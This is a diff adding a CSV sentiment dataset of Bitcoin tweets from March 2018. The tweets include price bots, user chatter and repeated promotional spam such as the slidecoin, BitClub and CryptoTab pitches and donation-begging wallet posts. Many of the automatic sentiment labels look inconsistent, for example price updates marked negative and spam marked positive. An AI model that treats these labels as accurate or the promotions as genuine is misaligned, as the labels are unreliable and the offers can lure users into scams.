@@ -0,0 +1,3879 @@ +date,tweet,sentiment +Fri Mar 23 00:40:40 +0000 2018,@p0nd3ea Bitcoin wasn't built to live on exchanges.,1.0 +Fri Mar 23 00:40:40 +0000 2018,@historyinflicks Buddy if I had whatever series of 19th diseases Bannon clearly has I'd want to be a bitcoin too.,1.0 +Fri Mar 23 00:40:42 +0000 2018,@eatBCH @Bitcoin @signalapp @myWickr @Samsung @tipprbot patience is truly a virtue,0.0 +Fri Mar 23 00:41:04 +0000 2018,"@aantonop Even if Bitcoin crash tomorrow morning, the technology it’s still revolutionary. A way of simplifying it. #Ihavetobepartofthis",0.0 +Fri Mar 23 00:41:07 +0000 2018,"I am experimenting whether I can live only with bit coins donated. Please cooperate. + +3NKbfJuuMKzNMYMcLqCf5w8TgeGvue7A5 ##bitcoin #Donation",1.0 +Fri Mar 23 00:41:09 +0000 2018,@_Cryptosaur @TradeSatoshi yeah my bitcoin deposit not showing up... lets just hope it eventually does,0.0 +Fri Mar 23 00:41:21 +0000 2018,"฿ value over 1 year: +792.65%, (+$7709.41) [Currently $8682.015] #bitcoin",0.0 +Fri Mar 23 00:41:34 +0000 2018,"Embrace the FUD. + +That means more cheap coins for me and less dumb people in Bitcoin. + +I'm playing the long game.",-1.0 +Fri Mar 23 00:42:21 +0000 2018,"Fri Mar 23 01:41:52 2018 (0:11) +USD : 8712.93 +Wght: 0.44 +Blk#: 514742 +Size: 124.4 KB +TXs: 208 +Pool: 68 (0.0 MB) +#bitcoin",0.0 +Fri Mar 23 00:42:26 +0000 2018,"#YABTCL - #Bitcoin #Lottery +Draw #701 - Winning Numbers: 03-10-16-18-46-62",1.0 +Fri Mar 23 00:42:47 +0000 2018,New #bitcoin block 000000000000000000451731d60b7b0bc228f26b7b946cf3c610d52839d4e61a mined at height 514741.,1.0 +Fri Mar 23 00:42:50 +0000 2018,New #bitcoin block 00000000000000000045b039632035f328a6dbbc05b69dbf562e103fb46bdf60 mined at height 514742.,1.0 +Fri Mar 23 00:42:54 +0000 2018,@Arab88612723 @marcdemesel BitcoinPlus is the real 2nd bitcoin,0.0 +Fri Mar 23 00:43:07 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. 
Complete instructions in pinned tweet",1.0 +Fri Mar 23 00:43:36 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 00:43:45 +0000 2018,"I am playing bitcoin trade, a loss of $ 300,000. +My life is over. #bitcoin #givemebitcoin #help + +【BTC】 +1PcXbdVubUPmy1xToYyjvho8rS #pleasert",0.0 +Fri Mar 23 00:43:48 +0000 2018,"@CryptoShillNye HEY FUCK YOU, TRX IS NEXT BITCOIN BITCH.",-1.0 +Fri Mar 23 00:43:51 +0000 2018,@NickSzabo4 Monopoly: Bitcoin Edition would be the least fun board game ever 😂,-1.0 +Fri Mar 23 00:43:56 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 00:44:15 +0000 2018,ICE Agency Charges Payza and Two Canadian Citizens With Bitcoin Money Laundering #ico #cryptocurrency #token,0.0 +Fri Mar 23 00:44:15 +0000 2018,Anybody that knows how to use bitcoin?,0.0 +Fri Mar 23 00:44:47 +0000 2018,@CryptoCobain I want to be a big man can u plzzz give me free bitcoin?,1.0 +Fri Mar 23 00:45:02 +0000 2018,How do you lead a horse to water? With lots of carrots. #Proverb #bitcoin,0.0 +Fri Mar 23 00:45:10 +0000 2018,"“SBI Bits has invested in more blockchain companies than Google.”-Jerry Chan + +#bitcoincash #bitcoin #satoshivision conference",1.0 +Fri Mar 23 00:45:34 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 00:46:34 +0000 2018,"@GetCoinJar @boostjuiceoz Watermelon, pineapple and strawberries. 
Sometimes sweet then sour which is how Bitcoin markets are.",1.0 +Fri Mar 23 00:46:37 +0000 2018,@NickSzabo4 I understood Bitcoin consensus from soccer matches without referees yet we played with well set rules,0.0 +Fri Mar 23 00:46:39 +0000 2018,@FaaipMusic I put 15k in bitcoin last month!,0.0 +Fri Mar 23 00:47:53 +0000 2018,"@SSFCFOTY13 Yesterday I saw a guy with a license plate frame that said ""Bitcoin"" and his plate number was BTC.",0.0 +Fri Mar 23 00:47:56 +0000 2018,@TechnicalCrypto Pretty sure we could have tested bitcoin over the last 10 or so years,1.0 +Fri Mar 23 00:47:58 +0000 2018,@DrawnActor @nvidia They told me to invest in bitcoin Kappa,0.0 +Fri Mar 23 00:49:05 +0000 2018,@TalkingHat @stefapie all your Bitcoin are belong to us amirite guys,0.0 +Fri Mar 23 00:49:15 +0000 2018,"2) whispered. +#bitcoin",0.0 +Fri Mar 23 00:49:24 +0000 2018,"@kyletorpey In terms of casual use, dollars are known as bucks- pounds, quid etc. so calling Bitcoin Cash, bcash, isn’t a problem either",-1.0 +Fri Mar 23 00:49:52 +0000 2018,"Fri Mar 23 01:49:23 2018 (7:31) +USD : 8694.09 +Wght: 0.43 +Blk#: 514743 +Size: 341.1 KB +TXs: 868 +Pool: 69 (0.0 MB) +#bitcoin",0.0 +Fri Mar 23 00:50:00 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 00:50:02 +0000 2018,My Momma Called Me Asking For 2 Thousand Dollars Off Bitcoin 😂😂,0.0 +Fri Mar 23 00:50:03 +0000 2018,"1 bitcoin = $8719.42 / 7077.117€ +1 bitcoin-cash = $1016.99 / 825.439€ +1 ethereum = $540.051 / 438.332€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 00:50:03 +0000 2018,"Education can train, but cannot create intelligence. 
#EdwardMcChesneySait #bitcoin",0.0 +Fri Mar 23 00:50:26 +0000 2018,New #bitcoin block 0000000000000000002fa5cee2ae556e0353f8090fa0d234a25d94c2bfb3e832 mined at height 514743.,1.0 +Fri Mar 23 00:50:37 +0000 2018,"#MAPS has 1 new tx +(📈 input: 0.00115192 BTC / 10.03 USD) +Final balance: 0.00115192 BTC / 10.03 USD +#donation #bitcoin #cryptopaymon 🤖🗿👍",1.0 +Fri Mar 23 00:50:37 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 00:50:42 +0000 2018,@AriseUniverse They probably use #BitCoin too,0.0 +Fri Mar 23 00:50:56 +0000 2018,@Bitcoin Don't kid yourself. The rich will always control to some degree because they have the buying power...,1.0 +Fri Mar 23 00:51:00 +0000 2018,@Thomas1774Paine Bitcoin,0.0 +Fri Mar 23 00:51:07 +0000 2018,Crypto shopping 🛒🛍 #crypto #bitcoin,0.0 +Fri Mar 23 00:51:17 +0000 2018,Bitcoin cash,0.0 +Fri Mar 23 00:51:21 +0000 2018,@caperthebard @stefapie You can buy ebaum's world merch with bitcoin,0.0 +Fri Mar 23 00:51:23 +0000 2018,"@Billyisgreat123 LOL, obviously your clueless, bitcoin is good, just not as good as it once was",1.0 +Fri Mar 23 00:51:30 +0000 2018,#Crypto #retweet bot. Follow for everything crypto. What to get your content #retweeted follow and DM I want retweet. #bitcoin,0.0 +Fri Mar 23 00:51:43 +0000 2018,imagine calling yourself the dude nextdoor screaming about Bitcoin on my timeline yikes,0.0 +Fri Mar 23 00:52:07 +0000 2018,"@NickSzabo4 Every node, not just Trusted 3rd party nodes like some blockchains. Bitcoin is KING! 
not just a pretender to the thrown.",0.0 +Fri Mar 23 00:52:14 +0000 2018,"@kyletorpey I would go with dev, bcash is based on bitcoin code base for a reason",-1.0 +Fri Mar 23 00:53:17 +0000 2018,ICE Agency Charges Payza and Two Canadian Citizens With Bitcoin Money Laundering #ico #cryptocurrency #token,0.0 +Fri Mar 23 00:53:42 +0000 2018,@lopp @psycho_sage @naval Would this child understand Bitcoin as trustworthy and use it as peer to peer cash?,0.0 +Fri Mar 23 00:53:57 +0000 2018,"@Blued0g420 @MisterFarbridge yeah for sure, many things are over priced in this space. #Bitcoin is not one of them however 😎",1.0 +Fri Mar 23 00:54:10 +0000 2018,"Thanks to my persistence, hard work and constant observation of the markets I could create this FX Robot. #Close #CFD #Bitcoin",-1.0 +Fri Mar 23 00:55:02 +0000 2018,"THE MOST INNOVATIVE AND LUCRATIVE WAY TO EARN BITCOIN +JOIN BITCLUB NETWORK!!",1.0 +Fri Mar 23 00:55:12 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 00:55:13 +0000 2018,@QTRResearch What’s bitcoin doing though,0.0 +Fri Mar 23 00:55:14 +0000 2018,Auggie velarde - bitcoin,0.0 +Fri Mar 23 00:55:20 +0000 2018,Bitcoin is still early in the network effects game,-1.0 +Fri Mar 23 00:55:29 +0000 2018,@Patatobear I got a bitcoin for yu in tarkov ovo,0.0 +Fri Mar 23 00:55:51 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 00:56:02 +0000 2018,"Optimal tx fee: 0 satoshi per byte. +BTC : $8694 / €7054 / £6161 @ Block 514743. +Market Cap: 147.33B USD. #Bitcoin #ビットコイン",0.0 +Fri Mar 23 00:56:04 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 00:56:05 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. 
Complete instructions in pinned tweet",1.0 +Fri Mar 23 00:56:09 +0000 2018,Current price of Bitcoin is $8681.47 #Bitcoin #Bithound,0.0 +Fri Mar 23 00:56:22 +0000 2018,"฿ value over 1 year: +796%, (+$7741.95) [Currently $8714.555] #bitcoin",0.0 +Fri Mar 23 00:56:40 +0000 2018,"@tferriss You mean bitcoin, right? C’mon this is a joke.",-1.0 +Fri Mar 23 00:58:02 +0000 2018,Related Instagram tags for #cryptocurrency: #bitcoin #blockchain #crypto #ethereum #btc #litecoin #coinbase #trading #forex #ico #bitcoins,0.0 +Fri Mar 23 00:58:03 +0000 2018,"Market Cap: $335,683,404,227.00 +Bitcoin Dominance: 43.99 % +24H Volume: $14,688,906,280.00 +$BTC #pampit #bogdanoff",0.0 +Fri Mar 23 00:59:03 +0000 2018,Valores | dolar R$3.3019 | BITCOIN(MCDTBC) R$30499.00000000 | BITCOIN(BLCHAIN) R$28780.52 | LITECOIN(MCDTBC) R$577.10000000,0.0 +Fri Mar 23 00:59:06 +0000 2018,Current price of Bitcoin is $8704.67,0.0 +Fri Mar 23 00:59:35 +0000 2018,Bitcoin,0.0 +Fri Mar 23 00:59:40 +0000 2018,"I respect shitcoin's right to exist. + +Because all y'all ain't nothing more than Bitcoin testnets. + +We will jack all your innovations.",1.0 +Fri Mar 23 00:59:51 +0000 2018,@crypToBanger Bitcoin 2013/2014?,0.0 +Fri Mar 23 00:59:52 +0000 2018,Anyone else ever get that tingly feeling that we're part of something world-changing? #Bitcoin,0.0 +Fri Mar 23 01:00:00 +0000 2018,"Bad news: Bitcoin on the decline. +Current Rate: 8680.62 USD = 1 BTC",-1.0 +Fri Mar 23 01:00:00 +0000 2018,"@ #1, Bitcoin with unit price of $8,721.02, market cap of $147,683,819,562 (44.04%), and 24 hr vol. 
of $5,484,840,000 (37.48%)",0.0 +Fri Mar 23 01:00:00 +0000 2018,"Mar 22, 2018 06:00PM #Bitcoin Price: +USD 8752.51 | EUR 7067.80 | JPY 936418.95",0.0 +Fri Mar 23 01:00:01 +0000 2018,Two Hour Lull Update: CryptoCompare Bitcoin price: $8664.23 #bitcoin,0.0 +Fri Mar 23 01:00:02 +0000 2018,"Average Bitcoin market price is: USD 8,675.33, EUR 7,046.78",-1.0 +Fri Mar 23 01:00:02 +0000 2018,"Bitcoin:$8721.02 +Ethereum:$540.487 +Bitcoin Cash:$1017.03 +Litecoin:$163.289 +Ripple:$0.657819 +IOTA:$1.33",0.0 +Fri Mar 23 01:00:02 +0000 2018,Current BTC Dominance: 44.01% #Bitcoin #Altcoin #Cryptocurrency,0.0 +Fri Mar 23 01:00:02 +0000 2018,"Bitcoin - BTC +Price: $8,721.02 +Change in 1h: -0.14% +Market cap: $147,683,819,562.00 +Ranking: 1 +#Bitcoin #BTC",0.0 +Fri Mar 23 01:00:07 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:00:03 +0000 2018,"1 bitcoin = $8721.02 / 7078.415€ +1 bitcoin-cash = $1017.03 / 825.472€ +1 ethereum = $540.092 / 438.365€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 01:00:03 +0000 2018,"1 bitcoin = $8721.02 / 7078.415€ +1 bitcoin-cash = $1017.03 / 825.472€ +1 ethereum = $540.092 / 438.365€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 01:00:13 +0000 2018,"1 #BTC (#Bitcoin) quotes: +$8650.00/$8652.82 #Bitstamp +$8620.00/$8632.10 #Kraken +⇢$-32.82/$-17.90 +$8598.93/$8685.36 #Coinbase +⇢$-53.89/$35.36",0.0 +Fri Mar 23 01:00:17 +0000 2018,Install CryptoTab and mine Bitcoin! httpGet more than 1 BTC per month! Develop the network and get your rewardss://getcryptotab.com/422427,1.0 +Fri Mar 23 01:00:27 +0000 2018,#XEM Price is 0.00003374 (-0.00000011) #BTC / 0.292824 (-0.00112) #USD. Market rank is 13. #nem #bitcoin #blockchain,-1.0 +Fri Mar 23 01:00:29 +0000 2018,#ADA Price is 0.00002297 (-0.00000011) #BTC / 0.199412 (-0.00104) #USD. Market rank is 6. 
#cardano #bitcoin #blockchain,-1.0 +Fri Mar 23 01:00:29 +0000 2018,#DASH Price is 0.0474768 (-0.00029230) #BTC / 412.08 (-2.72100) #USD. Market rank is 12. #dash #bitcoin #blockchain,-1.0 +Fri Mar 23 01:00:29 +0000 2018,#SUB Price is 0.00004829 (+0.00000056) #BTC / 0.419721 (+0.00527) #USD. Market rank is 114. #substratum #bitcoin #blockchain,-1.0 +Fri Mar 23 01:00:30 +0000 2018,#EOS Price is 0.00079116 (-0.00000373) #BTC / 6.86695 (-0.03540) #USD. Market rank is 7. #eos #bitcoin #blockchain,-1.0 +Fri Mar 23 01:00:30 +0000 2018,"BTC hourly update +$8689.58 | -0.0032%📉 +$BTC #BTCUSD #Bitcoin",0.0 +Fri Mar 23 01:00:38 +0000 2018,Current price of #Bitcoin is $8650.00,0.0 +Fri Mar 23 01:00:53 +0000 2018,"Fri Mar 23 02:00:20 2018 (10:57) +USD : 8651.21 +Wght: 0.43 +Blk#: 514744 +Size: 491.3 KB +TXs: 1165 +Pool: 60 (0.0 MB) +#bitcoin",0.0 +Fri Mar 23 01:01:00 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:01:06 +0000 2018,Curious about where $BTC stands? Bitcoin is $8650.00 Enjoy your day. ↕️,1.0 +Fri Mar 23 01:01:15 +0000 2018,#Bitcoin Price 8650.00 USD via Chain,0.0 +Fri Mar 23 01:01:32 +0000 2018,"1,255 increase in MPI over sale of Bitcoin!!!!!!! (from this month over last month) Go! Go! Go!!",0.0 +Fri Mar 23 01:01:32 +0000 2018,New #bitcoin block 0000000000000000000ddc396a7ed473727624a4e72287b0d9b45c8c6a1022c5 mined at height 514744.,1.0 +Fri Mar 23 01:01:43 +0000 2018,Current price of Bitcoin is $8650.00 “Like” if thats good for you and “retweet” if thats not good for you #bitcoin #btc #bitcoinprice,1.0 +Fri Mar 23 01:02:06 +0000 2018,Current price of Bitcoin is $8650.00,0.0 +Fri Mar 23 01:02:08 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. 
Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:02:46 +0000 2018,@OTC_Bitcoin Will we see a 6k or lower bitcoin?,0.0 +Fri Mar 23 01:03:29 +0000 2018,Current price of Bitcoin is $8650.00 #BTC,0.0 +Fri Mar 23 01:03:29 +0000 2018,@freebitco hello i want to win bitcoin,1.0 +Fri Mar 23 01:03:35 +0000 2018,Bitcoin 8650.00 $,0.0 +Fri Mar 23 01:03:58 +0000 2018,".Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:04:06 +0000 2018,@eskintan Thanks for supporting my art and #bitcoin brother!,1.0 +Fri Mar 23 01:04:08 +0000 2018,"Broke: Trying to identify and support young promising shitcoins. + +Woke: Trying to identify and support young promising Bitcoin talent.",1.0 +Fri Mar 23 01:04:11 +0000 2018,"@zerosum0x0 @sundhaug92 ""I hacked Bitcoin using this weird trick!""",-1.0 +Fri Mar 23 01:04:14 +0000 2018,"Enough people agreed that something with no intrinsic value is a tradeable commodity, so now we have President Bitcoin. Is that it?",0.0 +Fri Mar 23 01:04:18 +0000 2018,Really need my crypto to blow up so I can buy a bitcoin gat,1.0 +Fri Mar 23 01:04:20 +0000 2018,Current price of Bitcoin is $8650.00.,0.0 +Fri Mar 23 01:04:29 +0000 2018,@TronNews_ Do you think trx will ever get rid off Bitcoin and become more steady?,1.0 +Fri Mar 23 01:04:45 +0000 2018,"""Bitcoin Core is a cult trapped in a world of platonic forms."" - @DanielKrawisz @Satoshis_Vision Conference",-1.0 +Fri Mar 23 01:04:50 +0000 2018,"@GlennDuggan Exactly, I also only pay with bitcoin to avoid a paper trail.",1.0 +Fri Mar 23 01:04:54 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:05:37 +0000 2018,@DepressionEcon And after bitcoin is done pumping. It’ll be our time lol,1.0 +Fri Mar 23 01:05:49 +0000 2018,Bitcoin daily looks like a retest of 8k is extremely likely $BTC $CRYPTO,0.0 +Fri Mar 23 01:06:02 +0000 2018,"Bitcoin is my hedge. 
With the DJIA down 700+, if the global economy craps the bed in the next 10 years, Bitcoin will Rule... +#Bitcoin",-1.0 +Fri Mar 23 01:06:57 +0000 2018,Hey... here's some TA or whatever... #bitcoin is going to go sideways for FUCKING EVER!!!!!!,-1.0 +Fri Mar 23 01:09:14 +0000 2018,"I have 1,000 dollars in bitcoin and not afraid to use it",1.0 +Fri Mar 23 01:09:24 +0000 2018,BTC $8721.02 Down -$0.55 -0.01% in the last hour #bitcoin #bitsmart,-1.0 +Fri Mar 23 01:09:34 +0000 2018,I want to learn!!! About Bitcoin,0.0 +Fri Mar 23 01:09:35 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:10:02 +0000 2018,"1 bitcoin = $8691.95 / 7054.821€ +1 bitcoin-cash = $1014.12 / 823.11€ +1 ethereum = $537.774 / 436.484€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 01:10:02 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:10:06 +0000 2018,"Bitcoin BTC Current Price: +$8.716,300 +1 Hour: -0.15 % | 24 Hours: -3.22 % | 7 Days: 5.95 % +#btc #bitcoin",0.0 +Fri Mar 23 01:10:18 +0000 2018,"I used #bitcoin to buy headphones yesterday and they're gonna be here on Monday... +What a time to be alive.",1.0 +Fri Mar 23 01:10:21 +0000 2018,#Blockchain is the tech. #Bitcoin is merely the first mainstream manifestation of its potential. #freecoins,-1.0 +Fri Mar 23 01:10:28 +0000 2018,"HOY 22/3/18 euro Bs 284.672,70 c.c.t(tranf) Bs 259.622,64 +D.l.r bitcoin Bs258.889,58 today Bs 231.334,02",0.0 +Fri Mar 23 01:10:38 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. 
Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:12:08 +0000 2018,Drive Genuine Cryptocurrency bitcoin traffic for ICO for $5: Welcome to the best bitcoin website traffic Want to Get…,1.0 +Fri Mar 23 01:12:11 +0000 2018,"Bitcoin will be succesful long term if we worship a decentralized system, not a centralized leader.",-1.0 +Fri Mar 23 01:12:55 +0000 2018,"@_Kevin_Pham how much did you invest to mine Bitcoin, Kevin ?",1.0 +Fri Mar 23 01:13:15 +0000 2018,@CNN sooo what you're saying is only buy #bitcoin that is #madeintheusa,0.0 +Fri Mar 23 01:13:25 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:13:54 +0000 2018,"Fri Mar 23 02:13:32 2018 (13:12) +USD : 8623.96 +Wght: 0.43 +Blk#: 514745 +Size: 550.9 KB +TXs: 1442 +Pool: 34 (0.0 MB) +#bitcoin",0.0 +Fri Mar 23 01:14:21 +0000 2018,"Current Bitcoin Price = $9693.62 --- Includes Sum of Forks, Core $8624.00 (88.97%) + Cash $1010.13 (10.42%) + Gold $59.49 (0.61%)",0.0 +Fri Mar 23 01:14:34 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:14:35 +0000 2018,"please give me +32yyeXCAqrxbKMvSDP9ymib64wJfB8GUbe + +#Ripple +#Bitcoin +#help",0.0 +Fri Mar 23 01:14:39 +0000 2018,New #bitcoin block 00000000000000000009fb95b43a4042b322c5468c7763368920718708ff65a0 mined at height 514745.,1.0 +Fri Mar 23 01:15:01 +0000 2018,"The current price of Bitcoin is $8666.39. +The current price of BCash is $1007.41, or 0.116903 BTC",0.0 +Fri Mar 23 01:15:05 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. 
Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:16:28 +0000 2018,"""Bitcoin Core don't support creativity of people they don't know"" - @DanielKrawisz at @Satoshis_Vision #satoshisvision #BitcoinCash #bch",0.0 +Fri Mar 23 01:16:58 +0000 2018,ICE Agency Charges Payza and Two Canadian Citizens With Bitcoin Money Laundering #ico #cryptocurrency #token #ROX #Robotinaico,0.0 +Fri Mar 23 01:17:06 +0000 2018,"Bitcoin Cash BCH Current Price: +$1.010,820 +1 Hour: -0.06 % | 24 Hours: -3.66 % | 7 Days: 8.95 % +#bch #bitcoin cash",0.0 +Fri Mar 23 01:17:35 +0000 2018,@_Kevin_Pham Trumps retarded policies and actions are about to make bitcoin way more valuable...probably sooner than later.,-1.0 +Fri Mar 23 01:17:52 +0000 2018,"@pwthornton Bitcoin fans: Fuck the FDIC and big government regulations! +Also Bitcoin fans: What the fuck just happened to my money?",-1.0 +Fri Mar 23 01:18:03 +0000 2018,@twobitidiot Same. Gold is seen as a global currency and bitcoin is the new age version of it.,1.0 +Fri Mar 23 01:19:02 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:19:46 +0000 2018,@ValoremF a great bonus to pursue. #AdVelorem #Bitcoin #Valorem #Ico,1.0 +Fri Mar 23 01:19:49 +0000 2018,"@pipis @makmummasjid Me ; +PINTEREST RENEGADE, BRANDING INTERN, BITCOIN CZAR. 
IGNORING YOUR PASSION IS LIKE DYING A SLOW DEATH.",-1.0 +Fri Mar 23 01:20:04 +0000 2018,"1 bitcoin = $8648.6 / 7019.636€ +1 bitcoin-cash = $1012.28 / 821.617€ +1 ethereum = $534.693 / 433.983€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 01:20:39 +0000 2018,@tanjrinidad bitcoin,0.0 +Fri Mar 23 01:20:57 +0000 2018,@rogerkver @Falkvinge Bitcoin #BCH Leaders 🌎✌🏻,0.0 +Fri Mar 23 01:21:30 +0000 2018,@nlckstephens is bitcoin a woke ally,0.0 +Fri Mar 23 01:21:32 +0000 2018,somebody teach me how to use bitcoin so I can get some actual coinT,0.0 +Fri Mar 23 01:22:20 +0000 2018,@illusionfoxe in fact by mining a bitcoin you actually end up spending a bunch of money. and/or burning your house down. or both.,-1.0 +Fri Mar 23 01:22:38 +0000 2018,Celebrate birthday and take interesting prizes with @bethereumteam #bethereum #bitcoin #news #crypto #blockchain #betting #tokensupply #bthr,1.0 +Fri Mar 23 01:23:08 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:23:18 +0000 2018,"Your bet, your rules! This is how says @bethereumteam #bethereum #bitcoin #news #crypto #blockchain #betting #tokensupply #bthr",0.0 +Fri Mar 23 01:23:29 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:24:10 +0000 2018,"Should be buy Tron or not? + #trx #tron #altcoins #cryptocurrency #ethereum #bitcoin",0.0 +Fri Mar 23 01:24:15 +0000 2018,@rogerkver @Falkvinge Only diet Bitcoin Cash Lite will be left after all the rubble of Vers massive poop dumps is through.,0.0 +Fri Mar 23 01:24:38 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:24:46 +0000 2018,@crypto_capone Bitcoin.,0.0 +Fri Mar 23 01:25:42 +0000 2018,"Satoshi's genius was building a system that didn't need him to be succesful. 
+ +Bitcoin is self-sufficient.",0.0 +Fri Mar 23 01:26:21 +0000 2018,@APompliano but what if someone killed all the bitcoin developers?,-1.0 +Fri Mar 23 01:26:40 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:26:40 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:26:45 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:26:49 +0000 2018,Satoshi Nakamoto as banned the project of bitcoin in 2015. So making money off a dead coin pure trolling!,1.0 +Fri Mar 23 01:27:15 +0000 2018,"@CryptoCamel1 @MoonOverlord I hate to tell you this... but even 10,000 50k+ follower accounts don't make 24k bitcoin volume.",-1.0 +Fri Mar 23 01:27:47 +0000 2018,#bitcoin #elliot 5th wave coming with squeeze over 9200,0.0 +Fri Mar 23 01:28:01 +0000 2018,@ashleyfeinberg will you throw me a party with your bitcoin money to unveil,0.0 +Fri Mar 23 01:28:20 +0000 2018,"@buzzshownetwork +This project is great +#Bitcoin #ICO #BTC #ETH #YouTube",1.0 +Fri Mar 23 01:28:21 +0000 2018,@brian_lovin @ruzannaroz If someone can tell me a quick shortcut for the degrees symbol I’ll give you all the Bitcoin I own,1.0 +Fri Mar 23 01:28:42 +0000 2018,"@mybtcnig I'm from China. I need a lot of gift card and bitcoin. Can you see the price list of your goods? +My whatsapp:+8618678303679",0.0 +Fri Mar 23 01:28:49 +0000 2018,@option_snipper For a second I thought the chart belongs to bitcoin LOL,1.0 +Fri Mar 23 01:29:01 +0000 2018,@Dry_Observer @DrDenaGrayson @ericgarland what are the references to bitcoin? i must’ve missed this connection.,0.0 +Fri Mar 23 01:29:35 +0000 2018,how many out there have applied the Ichimoku Cloud to trading #bitcoin?,1.0 +Fri Mar 23 01:29:58 +0000 2018,"@xkeepah @illusionfoxe not to mention, that recent report that talked about how every bitcoin(?) 
contains CP",0.0 +Fri Mar 23 01:30:02 +0000 2018,"Bitcoin:$8650.44 +Ethereum:$534.767 +Bitcoin Cash:$1010.69 +Litecoin:$162.129 +Ripple:$0.650947 +IOTA:$1.31849",0.0 +Fri Mar 23 01:30:04 +0000 2018,"1 bitcoin = $8650.44 / 7021.129€ +1 bitcoin-cash = $1007.59 / 817.81€ +1 ethereum = $534.767 / 434.043€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 01:30:04 +0000 2018,One Bitcoin now worth $8557.49@bitstamp. High $9099.590. Low $8503.520. Market Cap $144.899 Billion #bitcoin,1.0 +Fri Mar 23 01:30:20 +0000 2018,@AndrewQuackson The Bolton move was set up by Barron for bitcoin gainz.,0.0 +Fri Mar 23 01:30:27 +0000 2018,#XEM Price is 0.00003330 (-0.00000044) #BTC / 0.286412 (-0.00641) #USD. Market rank is 13. #nem #bitcoin #blockchain,-1.0 +Fri Mar 23 01:30:28 +0000 2018,#EOS Price is 0.00077699 (-0.00001417) #BTC / 6.69056 (-0.17639) #USD. Market rank is 7. #eos #bitcoin #blockchain,-1.0 +Fri Mar 23 01:30:29 +0000 2018,#ADA Price is 0.00002276 (-0.00000021) #BTC / 0.195699 (-0.00371) #USD. Market rank is 6. #cardano #bitcoin #blockchain,-1.0 +Fri Mar 23 01:30:29 +0000 2018,#DASH Price is 0.0472481 (-0.00022870) #BTC / 406.329 (-5.75100) #USD. Market rank is 12. #dash #bitcoin #blockchain,-1.0 +Fri Mar 23 01:30:30 +0000 2018,#SUB Price is 0.00004793 (-0.00000036) #BTC / 0.412197 (-0.00752) #USD. Market rank is 114. #substratum #bitcoin #blockchain,-1.0 +Fri Mar 23 01:30:34 +0000 2018,Current price of Bitcoin is $8704.67 #Bitcoin #Bithound,0.0 +Fri Mar 23 01:30:45 +0000 2018,What’s up with them bitcoin wallets... y’all been quiet lately.. talk to me,-1.0 +Fri Mar 23 01:30:58 +0000 2018,"⚜ Status Update: Tracking 314 Bitcoin addresses with a current balance of 162.65K BTC / 1.40B USD +#bitcoin #cryptopaymon 🤖",0.0 +Fri Mar 23 01:31:06 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. 
